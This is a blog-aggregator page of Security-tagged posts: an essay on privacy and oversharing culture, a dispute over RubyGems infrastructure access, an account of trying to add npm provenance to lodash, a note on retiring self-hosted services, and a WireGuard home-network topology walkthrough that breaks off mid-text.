Posts in Security (20 found)
ava's blog 2 days ago

how can we (re)teach the importance of privacy?

A few days ago, a Twitch livestreamer streamed herself giving birth. As others sat on a sofa on the left filming and making content about it, you got to see her on the right in a tub, pushing, the more intimate parts turned away from the camera. In the background was a TV displaying the Twitch chat. I'm not here to comment on this decision directly, as she and the people involved have to make that decision and be comfortable with this moving forward, but it did make me think - we must be living through the least privacy-conscious time right now, huh? Maybe it is not even about being conscious of privacy, it's the growing devaluation of it. It goes a little deeper than just misguided retorts like " But I have nothing to hide! ". Ideas around privacy and data protection tend to overlap. Historically, if you wanted to keep something private, you just didn't talk about it, didn't write it down, didn't have it published - but that approach stopped working in the late 1900s. That's when the first data protection laws were created, as more data was recorded via new tech and states were interested in surveying or obtaining said data more or less forcefully. First, there was the Datenschutzgesetz (data protection law) of the state of Hesse in Germany in 1970 , which focused a lot on actual data safety. Then closely after, we have Sweden's Datalagen (data act), mistakenly often said to be the first worldwide (which is wrong!) that came into effect in 1974 . This law was established to regulate the handling of personal data and address Swedish citizens' concerns about privacy in the context of growing data processing technologies. A very important court decision was the Volkszählungsurteil (Census verdict) of 1983 by the Federal Constitutional Court in Germany. It laid the groundwork for informational self-determination, which means: Your right to decide who gets your data, how much, what kind of data, and when. The court held that those who don't know or can't control what information is being stored about their behavior tend to adjust their actions out of caution (also called ' Panopticism ' ) and that this not only restricts individual freedom, but also harms the common good, because a free and democratic society depends on the self-determined participation of its citizens. Offense about a census is something we can can hardly relate to nowadays, seeing how freely we share all kinds of information online; but back then, the idea of a census was a big deal . We cannot forget that just 40 years prior , that very same country gathered data on Jewish people, Sinti and Roma, disabled people, queer people and others to systematically oppress, torture and kill them. The hesitancy to gather data about specific groups after this ran so deep that it actually had a negative effect: In Germany, it was hard to detect or track the negative effects of thalidomide (' Contergan ') , a widely prescribed medication that ended up causing miscarriages and severe disfiguration in babies, because the state did not want to monitor congenital disorders so strictly after the Nazi regime had mandatory statistical monitoring under its Law for the Prevention of Hereditarily Diseased Offspring to commit various crimes against disabled people. That delayed making the connection between mothers taking thalidomide and the birth defects, harming more people in the meantime. As you can see, there used to be a lot of awareness around the risks of data you share and who collects it for what purposes - something that we are increasingly missing nowadays. It's not just that the internet and especially social media has normalized it, but that it also gets rewarded . Back then, what was the expected, foreseeable reward for sharing data with your state for the average person? Absolutely nothing, except for maybe getting punished for it in the future. There was also a culture of stigma and shame around sharing too much of your life. Nowadays though, sharing data freely with all kinds of actors, mostly companies, promises you fame and money - even information around debt, mental health, or a very messy house that people historically would rather die than share. For over two decades now, we have seen countless people have their lives changed by just one viral moment : Paid thousands for videos; book deals, podcast deals, album deals; roles in movies, collaborating with other stars, invited to red carpets and fashion shows; moving into mansions. The viral moment didn't have to be good, it just had to shock. Not sharing your life this intimately, or not sharing data at all, bars you from this completely, but participating is playing the lottery that this might happen to you, too. As living gets more precarious for many, gaming the attention economy is a chance they're willing to take, especially because it doesn't immediately seem like it has any sort of downside. If you win, you win, and if you don't, you don't and just make friends and share things with family and have an archive of your life, right? Obviously, it is not just that. People have had their lives ruined by doxxing , by hacks, by scammers using their own shared information against them. Companies leak data that puts the users at risk of identity fraud , stalkers misuse the trust the users give to them and the platform. People use the media others posted of themselves against their consent to create compromising deepfakes . Employers scour the net for your personal information before hiring you, and people might find out where you work and message your workplace to get you fired. States descend into authoritarian regimes and fascism , using what you have said online to persecute you. Unfortunately, users think all of this only ever happens to other people and is therefore not something they should keep in mind and consider while making accounts and posting. In their eyes, the victims have brought this on themselves, live in 'bad' countries, or had bad luck, and any measure taken to be more privacy-conscious is seen as completely wasted because of the surveillance device we keep in our pockets. To be clear, I am not saying that we should just shut up online; this very blog is the antithesis to that, and it would be hypocritical. But it has to be said: It is simply important to be aware, make a conscious decision and draw your own boundaries , while considering the worst case scenario. It is also about recognizing when we have been pressured and manipulated into oversharing by companies whose business model depends on it. Charlie White, while talking about the birth livestream, fittingly said the following: "I hate that there has been a complete deterioration of the value of privacy . It seems like people don't want privacy anymore. Like, there is no such thing as a special moment anymore if you can't monetize it and publicly display it . Something like the birth of your child, to me, would be [...] something so personal that you wouldn't want just a bunch of strangers peeking in on. [...] To me, this seems like a sign of the times where everything needs to be content-brained, content-oriented. There's really no other reason to be livestreaming the delivery of your child other than the obvious attention it's going to bring with it. To me, that just feels so odd, so [...] dystopian. [...] It turns something as sacred as life entering this world into a monetizable spectacle . An event that tons of people were watch-party-ing like it was a fucking football game. [...] I just think that is so fucking sad, that everything has to be content now. Before that baby can even have its first thought or open its eyes, it's already a piece of content, it's already in the social media chaos, it's already on camera. And to me, that's just crazy, but to many people, it's not. Which to me, that's kind of concerning, because we've deteriorated so much that everything is expected to be content now. " This is perfectly capturing the problem and the general attitude. We are in a culture that has lost the ability to properly assess the risks and draw boundaries in regards to privacy, where everything is content and new extremes need to be reached as viewers become desensitized or tired of the usual content strategy. People increasingly feel the need to go harder, show more, do more , be even more vulnerable to capture their audience or even get noticed, and it shows. We are reaching new levels of self-surveillance by the minute. We surveil not only our selves though, but also expose others , whether it is the people in our lives or simply strangers on the street. Our conflicts with others, or others' helpless, humiliating, embarrassing, weird or dangerous moments are now our content as we lift our phones to film the catastrophes, wars, fights and meltdowns we see. It's hard to draw the line between activism and monetizing crimes against humanity with some of them - is it just posted to create awareness, or also because it is content that will do numbers? There's also another aspect: We are living in more anxious times . The news cycle is constant and global and doomscrolling is common, so we have never been more aware of everything bad that is going on everywhere at the same time. It shows in our actions and mental health, always seeking to reassure and pacify ourselves. Our increasing feeling of being unsafe or our property being in danger is weaponized by companies looking to profit off of it. Don't you wanna see who's outside of your door? How about your driveway and your garden? How about the inside of your house so you can always check what your partner, your children and the pets are doing, or catch a burglar or fire early? Don't you wanna know where your loved ones are at all times? 1 It's giving way to constant control and checking. This has made so many people very comfortable to essentially deliver an almost completely unprotected livestream of their location, themselves, their neighbors, strangers just walking by, delivery personnel, friends and family, and any other guest (like repairmen) in or around their homes. Surveillance has made the switch from being seen as oppressive and overbearing to being basically synonymous with safety, which you can see ripples of in law as we are dealing with the UK's Age Verification Law and the EU's ChatControl . One has passed, one has a surprisingly likely chance to pass compared to the attitude and voting from the prior attempt. It's clear something has changed. Recently, I had to argue for or against a law for collection of IP addresses to fight cybercrime (' data retention ' or ' Vorratsdatenspeicherung ') for a class in my law degree. We were supplied with, but also had to research, arguments for both sides. Surprisingly, despite good arguments that the whole thing would not even be constitutional, I had a good amount of peers that valued a faux sense of safety over the constitution. One literally said " I would rather sacrifice my freedom than my safety " . So, in this culture, how do we teach people the importance and value of privacy, where becoming a glass citizen 2 is potentially a golden ticket and giving us a sense of safety, while being easier and way more fun in the short-term than the alternative is? To be honest, I just don't know. I feel like none of the arguments are reaching people anymore. They just don't care. It pales to other, more immediate concerns in their life, feels futile and touches too much on the few ways they seek relief in life. Being privacy-conscious is seen as if it is taking something away from them instead of giving them something. For some, it seems to be reduced this one-sided, technical challenge of choosing the right device or OS or browser, which complicates it further. Privacy isn't just turning some trackers off in the settings, it's also you figuratively pulling the blinds shut on your online presence for some moments. I'll leave you with a screenshot that my wife fittingly sent me this while writing this post: Sidenote: Should I start taking the difference between hyphens and em dashes seriously? Is it a good time to switch while AI is overusing the em dash? Let me know. I just never cared to select the em dash, as the hyphen was faster. Reply via email Published 12 Oct, 2025 Even I share my location with my wife and have GPS on some of my belongings. Sure, it is convenient for when I lose it, and it gives me a sense of safety that my wife knows where I am, but I am not naive about the downsides and normalization of more extreme forms. ↩ English version of the idea of a 'Gläserner Mensch' , a data protection/privacy concept about becoming fully transparent/see-through due to all kinds of surveillance. ↩ Even I share my location with my wife and have GPS on some of my belongings. Sure, it is convenient for when I lose it, and it gives me a sense of safety that my wife knows where I am, but I am not naive about the downsides and normalization of more extreme forms. ↩ English version of the idea of a 'Gläserner Mensch' , a data protection/privacy concept about becoming fully transparent/see-through due to all kinds of surveillance. ↩

0 views
André Arko 4 days ago

The RubyGems “security incident”

Ruby Central posted an extremely concerning “ Incident Response Timeline ” today, in which they make a number of exaggerated or purely misleading claims. Here’s my effort to set the record straight. First, and most importantly: I was a primary operator of RubyGems.org, securely and successfully, for over ten years. Ruby Central does not accuse me of any harms or damages in their post, in fact stating “we have no evidence to indicate that any RubyGems.org data was copied or retained by unauthorized parties, including Mr. Arko.” The actions I took during a time of great confusion and uncertainty (created by Ruby Central!) were careful, specific, and aimed to defend both Ruby Central the organization and RubyGems.org the service from potential threats. The majority of the team, including developers in the middle of paid full-time work for Ruby Central, had just had all of their permissions on GitHub revoked. And then restored six days later. And then revoked again the next day. Even after the second mass-deletion of team permissions, Marty Haught sent an email to the team within minutes, at 12:47pm PDT, saying he was (direct quote) “terribly sorry” and “I messed up”. Update : Added email timestamp. The erratic and contradictory communication supplied by Marty Haught, and the complete silence from Shan and the board, made it impossible to tell exactly who had been authorized to take what actions. As this situation occurred, I was the primary on-call. My contractual, paid responsibility to Ruby Central was to defend the RubyGems.org service against potential threats. Marty’s final email clearly stated “I’ll follow up more on this and engage with the governance rfc in good faith.”. Just a few minutes after that email, at 1:01pm PDT, Marty also posted a public GitHub comment , where he agreed to participate in the proposed governance process and stated “I’m committed to find the right governance model that works for us all. More to come.” Update : screenshot of comment removed and replaced with link, since the comment appears to still be visible (at least to logged out users) on GitHub. Given Marty’s claims, the sudden permission deletions made no sense. Worried about the possibility of hacked accounts or some sort of social engineering, I took action as the primary on-call engineer to lock down the AWS account and prevent any actions by possible attackers. I did not change the email addresses on any accounts, leaving them all owned by a team-shared email at rubycentral.org, to ensure the organization retained overall control of the accounts, even if individuals were somehow taking unauthorized actions. Within a couple of days, Ruby Central made an (unsigned) public statement, and various board members agreed to talk directly to maintainers. At that point, I realized that what I thought might have been a malicious takeover was both legitimate and deliberate, and Marty would never “fix the permissions structure”, or “follow up more” as he said. Once I understood the situation, I backed off to let Ruby Central take care of their “security audit”. I left all accounts in a state where they could recover access. I did not alter, or try to alter, anything in the Ruby Central systems or GitHub repository after that. I was confident, at the time, that Ruby Central’s security experts would quickly remove all outside access. My confidence was sorely misplaced. Almost two weeks later, someone asked if I still had access and I discovered (to my great alarm), that Ruby Central’s “security audit” had failed. Ruby Central also had not removed me as an “owner” of the Ruby Central GitHub Organization. They also had not rotated any of the credentials shared across the operational team using the RubyGems 1Password account. I believe Ruby Central confused themselves into thinking the “Ruby Central” 1Password account was used by operators, and they did revoke my access there. However, that 1Password account was not used by the open source team of RubyGems.org service operators. Instead, we used the “RubyGems” 1Password account, which was full of operational credentials. Ruby Central did not remove me from the “RubyGems” 1Password account, even as of today. Aware that I needed to disclose this surprising access, but also aware that it was impossible for anyone except former operators to exploit this security failure, I immediately wrote an email to Ruby Central to disclose the problem. Here is a copy of my disclosure email, in full. Ruby Central did not reply to this email for over three days. When they finally did reply, they seem to have developed some sort of theory that I was interested in “access to PII”, which is entirely false. I have no interest in any PII, commercially or otherwise . As my private email published by Ruby Central demonstrates, my entire proposal was based solely on company-level information, with no information about individuals included in any way. Here’s their response, over three days later. In addition to ignoring the (huge) question of how Ruby Central failed to secure their AWS Root credentials for almost two weeks, and appearing to only be aware of it because I reported it to them , their reply also failed to ask whether any other shared credentials might still be valid. There were more. Unbeknownst to me, while I was answering Marty’s email in good faith, Ruby Central’s attorney was sending my lawyer a letter alleging I had committed a federal crime, on the theory that I had “hacked” Ruby Central’s AWS account. On the contrary, my actions were taken in defense of the service that Ruby Central was paying me to support and defend. With my side of the story told, I’ll leave it to you to decide whether you think it’s true that “Ruby Central remains committed to transparent, responsible stewardship of the RubyGems infrastructure and to maintaining the security and trust that the Ruby ecosystem depends on.”

1 views
crtns 1 weeks ago

On Being Blocked From Contributing to lodash

My Github account was blocked from contributing security improvements to the lodash project. This was my first open source work in a while, and unfortunately, it appears it was a waste of time. That said, I did learn a few lessons about contributing to open source projects that others might benefit from. I've been going down a rabbit hole to figure out how to improve supply chain security in the JavaScript ecosystem. A common problem is the inability to trust the true origin of code within a package and how that package was built and published. Phishing attacks on npm registry users exploit this weakness - threat actors with stolen credentials will directly publish malicious package versions to the npm registry, bypassing CI/CD entirely. A consumer of the package will be none the wiser. will happily install the malicious package version if configured to do so. One way to detect this type of attack is through package provenance. Publishing packages with provenance is the process of creating a signed statement of attestation during the building of a package so that the build process can later be verified. The statement of attestation contains metadata about the build, provided in part by a trusted CI/CD platform, like Github Actions runners. While not a security panacea, dependent projects can check the statement of attestation to detect whether a package was published by a trusted CI/CD process or directly uploaded to the artifact registry, bypassing CI/CD. The npm client itself has made the process of generating and publishing a statement of attestation trivial - all you need is a Github Actions workflow that runs the command with these flags. For packages that already use Github as a code forge, adopting a workflow to publish packages with these additional flags is, in most cases, a low-effort task. Despite this, the adoption of package provenance appears abysmally low. Of the ten most popular packages on the npm registry, only two are published with provenance. Even the package is not published with provenance. I've always felt like an outsider in the world of open source - mostly a consumer, not a contributor. It occurred to me that since I value having npm packages published with provenance, I could be the one to push those PRs. This could be my way of giving something back. Among the top ten packages on npmjs.com without provenance, lodash was the one that caught my eye. I have used lodash many times, both professionally and personally. What stood out specifically about it is that there has not been a new release in over 5 years, but it's still being downloaded tens of millions of times per week. When I went to the Github repo, I saw the main branch had not received a new commit in 9 months. When I checked for a workflow to publish the package, I found nothing. I saw what I thought was a good opportunity. I was certain I could figure out the build process, create a new Github Actions workflow to automatically build lodash, and add provenance to boot. I figured if my initial PR was rejected, I could at least start a conversation about supply chain security and reproducible builds for this very popular project. Within a few hours, I had a workflow that was mostly working. I reverse-engineered the packaging workflow by digging through git history, reading docs and the wiki. I even managed to publish a forked version of lodash to npmjs with provenance after some trial and error. Unfortunately for me, that trial and error included opening a PR against the lodash repo before I was ready. I quickly closed the PR because I realized that the build artifacts in my version were not quite a 1-to-1 match with what was in the latest build of lodash. I spent a few more hours in vain trying to figure out how to replicate the build. Eventually, I called it a day and decided to open an issue in the morning to ask the last maintainer who published a build how they managed to generate it. I quickly typed up a Github issue the next morning and pressed "Create". Nothing happened. I looked around and saw an error I had never seen before on Github: "Error - Failed to create the issue." I figured Github was having an outage, so I took a break and did something else. When I tried again though, I saw the same error repeatedly, even after changing the title and content of the issue several times in the off chance I was triggering some kind of blocklist. I decided to try and reproduce the issue in my own repository. No error - I was able to create a Github issue successfully. At this point, I suspected something was up specifically with lodash but I wasn't sure what. I went back to my closed PR on a hunch and noticed some new activity. The PR, despite being already closed, was locked and limited to collaborators. At this point, I was fairly certain I had been blocked. What finally gave it away was when I tried to use the watch action on the lodash Github repo, I got a truly bizarre and nonsensical error - I couldn't watch more than 10,000 repos on Github. I don't even watch 100 repos, and I could watch any other repo I wanted, outside of the lodash organization. In an attempt to reach out to clear up any misunderstandings, I opened a Github issue on my forked repo, tagged the lodash org and primary maintainer, and explained the situation. I gave context as to why I had opened the PR, and what I wanted to achieve. Two weeks later, no response. As a last-ditch effort, I sent an email directly to the same primary maintainer, using an email I found in git commit history, but I have also received no response there either. At this point, I believe I've been permanently blocked. While the effort I ultimately put into this project appears not to have furthered my goals, at least this was a learning experience. My contributions being rejected reinforces a belief I already held before going into this project - open source maintainers don't owe me anything. That said, I'm still confused as to why I was blocked for opening a single PR. I wanted to spark a conversation on how to publish a new version of lodash and ultimately make the build process transparent and trustworthy. I'm genuinely curious if my PR was viewed incorrectly as malicious, or if the maintainer who blocked me simply has no interest in what I was trying to do and is signaling that to the lodash community. When I have time, I will continue to try and add provenance to open source NPM packages where I believe there is value, but I will start slowly and open an issue first to discuss the change. If there's interest, I'll create a pull request. If I'm ignored, I'll move on. My mistake with lodash was jumping in headfirst without gauging the interest of the maintainers or getting a better sense of what was happening in the project. I found out after the fact that the primary maintainer of lodash declared "issue bankruptcy" back in 2023 , closing a slew of open Github issues and starting from scratch, and that a major rewrite of the codebase seems to have stalled out with no progress in 11 months. While the CONTRIBUTING.md in the repo indicates "Contributions are always welcome", I mistakenly believed that demonstrating enthusiasm through a pull request was the best way to contribute to open source. I should have known better. As a professional software engineer, I've learned this lesson before: more effort upfront doesn't guarantee results. A five-minute conversation to gauge interest can save hours of work on an unwanted PR.

0 views
Joel Drapper 2 weeks ago

Ruby Central’s “security measures” leave front door wide open

Despite locking maintainers out of

1 views
neilzone 2 weeks ago

I am getting better at turning off unneeded self-hosted services

One of the things at which I’ve become better over the years is turning off self-hosted services. I love self-hosting things, and trying out new things, but I am also mindful that each new thing carries its own set of risks, particularly in terms of security. Similarly, while I do my best to secure servers and services to a reasonable standard, and to isolate things in a sensible way on our network, there is still residual risk and, if I am not using something enough, there is no point me tolerating that risk. So, once a month, I take a look at what I am self-hosting, and decide (a) if I really still need each thing, and (b) if I do, if I am doing the thing in the most sensible (for me) way. Occasionally, I am on the fence, particularly if it is something that I use infrequently but do still use it. Those are prime candidates for considering if I can achieve the same thing but in a better way. This is particularly true of services where upgrading them in a bit of a pain - I automate as much as I can, but if I have to interfere with something manually, then it is a greater risk, and I am less likely to keep it around. Overall, though, I’ve become a bit more ruthless in taking things down. I have backups, and, if I take down something which I later decide that I want to use, I can always reinstall it and restore the backup. I also go through and remove the DNS entries, and any firewall configuration, and again I have backups of those. I get the benefit of trying new things, but in a more managed manner.

1 views
Gabriel Garrido 3 weeks ago

WireGuard topologies for self-hosting at home

I recently migrated my self-hosted services from a VPS (virtual private server) at a remote data center to a physical server at home. This change was motivated by wanting to be in control of the hardware and network where said services run, while trying to keep things as simple as possible. What follows is a walk-through of how I reasoned through different WireGuard toplogies for the VPN (virtual private network) in which my devices and services reside. Before starting, it’s worth emphasizing that using WireGuard (or a VPN altogether) is ont strictly required for self-hosting. WireGuard implies one more moving part in your system, the cost of which is justified only by what it affords you to do. The constraints that I outline below should provide clarity as to why using WireGuard is appropriate for my needs. It goes without saying that not everyone has the same needs, resources, and threat model, all of which a design should account for. That said, there isn’t anything particularly special about what I’m doing. There is likely enough overlap here for this to be useful to individuals or small to medium-sized organizations looking to host their services. I hope that this review helps others build a better mental model of WireGuard, and the sorts of networks that you can build up to per practical considerations. Going through this exercise proved to be an excellent learning experience, and that is worthwhile on its own. This post assumes some familiarity with networking. This is a subject in which acronyms are frequently employed, so I’ve made sure to spell these out wherever introduced. The constraints behind the design of my network can be categorized into first-order and second-order constraints. Deploying WireGuard responds to the first-order constraints, whereas the specifics of how WireGuard is deployed responds to the second-order constraints. There should be no dependencies to services or hardware outside of the physical network. I should be able to connect to my self-hosted services while I’m at home as long as there’s electricity in the house and the hardware involved is operating without problems. Borrow elements of the Zero Trust Architecture where appropriate. Right now that means treating all of my services and devices as resources, securing all communications (i.e not trusting the underlying network), and enforcing least-privileged access. Provisions made to connect to a device from outside the home network should be secondary and optional. While I do wish to use to my services while I’m away, satisfying this should not compromise the fundamental design of my setup. For example, I shouldn’t rely on tunneling services provided by third-parties. Choosing to deploy WireGuard is motivated by constraints two and three. Constraint one is not sufficient on its own to necessitate using WireGuard because everything can run on the local area network (LAN). Once deployed, I should be able to connect all of my devices using hardware, software, and keys that I control within the boundaries of my home office. These devices all exist in the same physical network, but may reside in separate virtual LANs (VLANs) or subnets. Regardless, WireGuard is used to establish secure communications within and across these boundaries, while working in tandem with network and device firewalls for access control. I cannot connect to my home network directly from the wide area network (WAN, e.g the Internet) because it is behind Carrier-Grade Network Address Translation (CGNAT) . A remote host is added to the WireGuard network to establish connections from outside. This host runs on hardware that I do not control, which goes against the spirit of the first constraint. However, an allowance is made considering that the role of this peer is not load-bearing in the overarching design, and can be removed from the network as needed. Assuming WireGuard is now inherent in this design, its use should adhere to the following constraints: Use WireGuard natively as opposed to software that builds on top of WireGuard. I choose to favor simplicity and ease of understanding rather than convenience or added features, ergo , complexity. Use of a control plane should not be required. All endpoints are first-class citizens and managed individually, regardless of using a network topology that confers routing responsibilities to a given peer. Satisfying these constraints preclude the use of solutions such as Tailscale, Headscale, or Netbird. Using WireGuard natively has the added benefit that I can rely on a vetted and stable version as packaged by my Linux distribution of choice, Debian . Lastly, it is worth stating requirements or features that are often found in designs such as these, but that are not currently relevant to me. Mesh networking and direct peer-to-peer connections. It’s ok to have peers act as gateways if connections need to be established across different physical or logical networks. The size, throughput, and bandwidth of the network is small enough that prioritizing performance is not strictly necessary. Automatic discovery or key distribution . It’s ok for nodes in the network to be added or reconfigured manually. Let’s look at the resources in the network, and how these connect with each other. Consider the following matrix. Each row denotes whether the resource in the first column connects to the resources in the remaining columns, either to consume a service or perform a task. For example, we can tell that the server does not connect to any device, but all devices connect to the server. Said specifically: The purpose of this matrix is to determine which connections between devices ought to be supported, regardless of the network topology . This informs how WireGuard peers are configured, and what sort of firewall rules need to be established. Before proceeding, let’s define the networks and device IP addresses that will be used. The name of the WireGuard network interface will be , where applicable 1 . For purposes of this explanation, port will be used in all of the devices when a port needs to be defined. I’ll explore different topologies as I build to up to the design that I currently employ. By starting with the simplest topology, we can appreciate the benefits and trade-offs involved in each step, while strengthening our conceptual model of WireGuard. Each topology below is accompanied by a simple diagram of the network. In it, the orange arrow denotes a device connecting to another device. Where two devices connect to each other, a bidirectional arrow is employed. Later on, green arrows denote a device forwarding packets to and from other resources. The basic scenario, and perhaps the most familiar to someone looking to start using WireGuard to self-host at home, is hosting in the network that is established by the router provided by an Internet service provider (ISP). Let’s assume its configuration has not been modified other than changing the Wi-Fi and admin passwords. A topology that can be used here is point-to-point , where each device lists every other device it connects to as its peer. In WireGuard terminology, “peers” are endpoints configured to connect with each other to establish an encrypted “tunnel” through which packets are sent and received. According to the connections matrix, the desktop computer and the server are peers, but the desktop computer and tablet aren’t. The WireGuard configuration for the desktop computer looks as follows: Note that the LAN IP address of each peer is specified under . This is used to find the peer’s device and establish the WireGuard tunnel. specifies the IP addresses used within the WireGuard network. In other words, the phone is the desktop’s peer, it can be found at to establish the tunnel. Let’s assume each of these devices have firewalls that allow UDP traffic through port and all subsequent traffic through the WireGuard interface. Once the WireGuard configurations of the server, laptop, and phone include the corresponding peers, secure communication is established through the WireGuard network interface. Let’s try sending a packet from the desktop computer to the phone. The packet was routed directly to the phone and echoed back. At this point access control is enforced in each device’s firewall. Allowing everything that comes through the interface is convenient, but it should be limited to the relevant ports and protocols for least-privileged access. An obvious problem with this scenario is that the Dynamic Host Configuration Protocol (DHCP) server in the router likely allocates IP addresses dynamically when devices connect to the LAN network. The IP address for a device may thus change over time, and WireGuard will be unable to find a peer to establish a connection to it. For example, I’m at home and my phone dies. The LAN IP address is freed and assigned to another device that comes online. WireGuard will attempt to connect to (per ) and fail for any of the following reasons: Fortunately, most routers support configuring static IP addresses for a given device in the network. Doing so for all devices in our WireGuard network fixes this problem as the IP address used in will be reserved accordingly. Suppose I want to work at a coffee shop, but still need access to something that’s hosted on my home server. As mentioned in the constraints, my home network is behind CGNAT. This means that I cannot connect directly to it using whatever WAN IP address my router is using at the moment. What I can do instead is use a device that has a publicly routable IP address and make that a WireGuard peer of our server. In this case that’ll be a VPS in some data center. How is the packet ultimately relayed to and from the server at home? Both the server and laptop established direct encrypted tunnels with the VPS. WireGuard on the VPS will receive the encrypted packets from the laptop, decrypt them, and notice that they’re meant for the server. It will then encrypt these packets with the server’s key and send them through the server’s tunnel. It’ll do same thing with the server’s response, except towards the laptop using the laptop’s tunnel. A device that forwards packets between peers needs to be configured for IPv4 packet forwarding. I will not cover the specifics of this configuration because it depends on what operating system and firewall are used 2 . The VPS has a public IP address of , and its WireGuard IP address will be . The laptop and server are listed as peers in its WireGuard configuration: Note that is omitted for each peer. The publicly routable IP addresses of the laptop and the home router are not known to us. Even if they were, they cannot be reached by the VPS. However, they will be known to the VPS when these connect to it. Now, the server at home adds the VPS as its peer, using the VPS public IP address as its : We also make use of to send an empty packet every 25 seconds. This is done to establish the tunnel ahead of time, and to keep it open. This is necessary because otherwise the tunnel may not exist when I’m at the coffee shop trying to access the server at home. Remember, the VPS doesn’t know how to reach the server unless the server is connected to it. Let’s take a careful look at the laptop’s configuration, and what we’re looking to achieve. When the laptop is at home, it connects to the server using an endpoint address that is routable within the home LAN network. This endpoint address is not routable when I’m outside, in which case I want the connection to go through the VPS. To achieve this, the laptop maintains two mutually-exclusive WireGuard interfaces: and . The former is active only while I’m in the home network, and the latter while I’m on the go. Unlike the server, the VPS does not need to be added as a peer to the laptop’s interface because it doesn’t need connect to it while at home. Instead, the VPS is added to the configuration: The section for both and is mostly the same. The laptop should have the same adress and key, regardless of where it is. Only is omitted in because no other device will look to connect to it, in which case we can have WireGuard set a port dynamically. What differs is the peer configuration. In the VPS is set as the only peer. However, the home server’s IP address is added to the VPS’ list of . WireGuard uses this information to route any packets for the VPS or the server through the VPS. Unlike the server’s peer configuration for the VPS, is not needed because the laptop is always the one initiating the tunnel when it reaches out to the server. We can verify that packets are being routed appropriately to the server through the VPS: We solved for outside connectivity using a network topology called hub-and-spoke. The laptop and home server are not connecting point-to-point. The VPS acts as a hub or gateway through which connections among members of the network (i.e the spokes) are routed. If we scope down our network to just the laptop and the home server, we see how this hub is not only a peer of every spoke, but also just its only peer. Yet, how exactly is the packet routed back to the laptop? Mind you, at home the laptop is a peer of the server. When the server responds to the laptop, it will attempt to route the response directly to the laptop’s peer endpoint. This fails because the laptop is not actually reachable via that direct connection when I’m on the go. This makes the laptop a “roaming client”; it connects to the network from different locations, and its may change. This all works because the hub has been configured to do Network Address Translation (NAT); it is replacing the source address of each packet for its own as it is being forwarded. The spokes at end of each hub accept the packets because they appear to originate from its peer. In other words, when the laptop is reaching out to the home server, the server sees traffic coming from the VPS and returns it there. The hub is forwarding packets among the spokes without regards to access control. Thus, its firewall should be configured for least-privilege access. For example, if the laptop is only accessing git repositories in the home server over SSH, then the hub firewall should only allow forwarding from the laptop’s peer connection to the home server’s IP address and SSH port. Let’s reiterate. If I now wish to sync my laptop with my desktop computer from outside the network, I would be adding yet another spoke to this hub. The desktop computer and the VPS configure each other as peers, while the desktop’s IP address is included in the VPS’ list of the laptop’s configuration. Our topology within the home network is still point-to-point. As soon as I return home, my laptop will connect directly to the server when I toggle off and on. But now that we know about hub-and-spoke , it might make sense to consider using it at home as well. According to the connection matrix, the server can assume the role of a hub because all other devices already connect to it. Likewise, the server runs 24/7, so it will always be online to route packets. This topology simplifies the WireGuard configurations for all of the spokes. The desktop computer, phone, laptop, and tablet can now list the server as its only peer in . This is convenient because now only one static address in the LAN network needs to be allocated by the DHCP server – the server’s. Consider the changes to the WireGuard configuration of the desktop computer. All peers are removed except the server, and the IPs of the phone and laptop are added to the server’s of . WireGuard will route packets for these other hosts through the server. We could also use Classless Inter-Domain Routing (CIDR) notation to state that packets for all hosts in the WireGuard network go through the server peer: The server, in turn, keeps listing every device at home as its peer but no longer needs an for each. The peers will initiate the connection to the server. Once again, let’s test sending a packet from the desktop computer to the phone. The packet was hops once through the server ( ), is received by the phone, and is echoed back. The downside to this topology is that the server is now a single point of failure. If the server dies then the spokes won’t be able to connect with each other through WireGuard. There’s also an added cost to having every packet flow through the hub. As for access control, much like we saw in the VPS, the hub now concentrates firewalling responsibilities. It knows which peer is looking to connect to which peer, thus it should establish rules for which packets can be forwarded. This is not mutually exclusive with input firewall rules on each device; those should exist as well. We’ve seen that home hub will route packets between the spokes. Furthermore, because it is peer of the VPS, the server can be used to route connections coming from outside the LAN network. Effectively, these are two hubs that connect to each other so that packets can flow across separate physical networks. If the laptop wants to sync with the desktop while it is outside the LAN network, then the packets make two hops: once through the VPS, and another through the server. If the laptop is within the LAN network, the packets hop only once through the server. Yet, there’s a subtle caveat to this design. The laptop can initiate a sync with the desktop from outside the LAN network and receive the response that it expects. However, the desktop can only initiate a sync with the laptop while the latter is within the LAN network. Why? Similar to our previous example of the laptop communicating with the server, the laptop is configured as a peer of the home hub. When the desktop initiates a sync, the server will attempt to route the packet to the laptop. Per our last change, the laptop doesn’t have a fixed and there is no established tunnel because the laptop is outside the network. Additionally, the home hub is not configured to route packets destined for the laptop through the VPS peer. The packet is thus dropped by the hub. One could look into making the routing dynamic such that the packets are delivered through other means, perhaps through mesh networking. But herein lies a compromise that I’ve made. In this design, a spoke in the home hub cannot initiate connections to a roaming client. It can only receive connections from them, because the roaming client uses NAT through the remote hub. I’m perfectly fine with this compromise as I don’t actually need this bidirectionality, and I don’t want the additional complexity from solving this issue. The remote hub facilitates tunneling into the home hub, not out of. My needs call for allowing my mobile devices (e.g laptop, phone, tablet) to communicate with the non-mobile devices at home (e.g server, desktop), and this has been solved. At this point we’re done insofar the overarching topology of our WireGuard network, but there is an improvement that can be made to make our home hub less brittle. Consider the case where I’m using a router that can run WireGuard. Making the router the hub of our home network poses some benefits over the previous setup. First, the router is already a single point of failure by way of being responsible for the underlying LAN network. Making the router the hub isn’t as costly as it is with some other device in the network. Second, all devices in the network are already connected to the router. This simplifies the overall configuration because it is no longer necessary to configure static IP addresses in the DHCP server. Instead, each spoke can use the network gateway address to reach the hub. Let’s the assume that the gateway for the LAN network is , and the WireGuard IP address for the router is . Each spoke replaces the server peer with the router’s, and uses the gateway address for its . For example, in the desktop computer: The server is demoted to a spoke and is configured like all other spokes. In turn, the router lists all peers like the server previously did: Again, the firewall in the router is now responsible for enforcing access control between spokes. For the sake of illustrating how much further the underlying networks can evolve without interfering with the WireGuard network, consider the final design. I’ve broken apart the LAN network into separate VLANs to isolate network traffic. The server resides in its own VLAN, and client devices in another. The router keeps on forwarding packets in WireGuard network regardless of where these devices are. The only change that is necessary to keep things working is to update address for the router peer in each spoke. The spoke now uses the corresponding VLAN gateway address, rather than that of the LAN network: I’ve been using this setup for some months now and it’s been working without issues. A couple of thoughts come to mind having gone through this exercise and written about it. Running WireGuard on the router simplifies things considerably. If the home network were not behind CGNAT then I could do away with the VPS hub altogether. I would still need separate WireGuard interfaces for when I’m on the go, but that’s not a big deal. Nonetheless, within the LAN network, configuration is simpler by using a hub-and-spoke topology with the router as hub. Centralizing access control on the router’s firewall is also appreciated. WireGuard is simple to 